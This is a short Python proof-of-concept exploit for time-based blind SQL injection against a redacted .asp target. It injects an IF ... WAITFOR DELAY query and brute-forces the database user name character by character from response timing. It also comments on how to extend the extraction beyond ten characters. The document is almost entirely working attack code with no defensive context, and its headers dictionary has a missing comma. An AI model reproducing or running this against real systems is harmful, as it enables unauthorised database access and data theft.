exploit to extract data with SQLi

exploit.py

#!/usr/bin/env python


# XXXX.asp time-based SQL injection PoC exploit
# Rafal 'bl4de' Janicki

import requests

# base url
base_url = 'http://REDACTED :/'
# delay in case of TRUE returned by query
delayed = '00:00:08'

charset = 'ABCDEFGHIJKLMNOPQRSTUWVXYZabcdefghijklmnopqrstuwvxyz 1234567890-_@#$~'

# QUERY to execute
query = "';IF (user_name() LIKE '{}%25') WAITFOR DELAY '{}'-- "

# here goes payload
payload = ''


def get_headers():
    return {
        'Cookie': 'XXXX'
        'Host': 'XXXXX',
        'Pragma': 'no-cache',
        'Upgrade-Insecure-Requests': 1
    }


def make_request(url):
    resp = requests.get(url, headers=get_headers())
    return resp


def measure_response_time(resp):
    return resp.elapsed.total_seconds()


print "[+] Query: {}".format(query.format('', delayed))
print "[+] URL called: {}".format(base_url + query)
print "[+] delay in time-based IF set to: {}".format(delayed)

# we extract 10 characters in one script run
# if string is longest that 10 chars, this script can be executed with
# initial payload set to already found string, so the first iteration will
# look for 11th char and so on; or just increase max in range() call
for i in range(0, 10):
    for c in charset:
        url = base_url + query.format(payload + c, delayed)
        resp = make_request(url)
        if measure_response_time(resp) > 8:
            payload = payload + c
            print "[+] found character: {} -  current string is {}".format(c, payload)
            break

print "[+] final: {}".format(payload)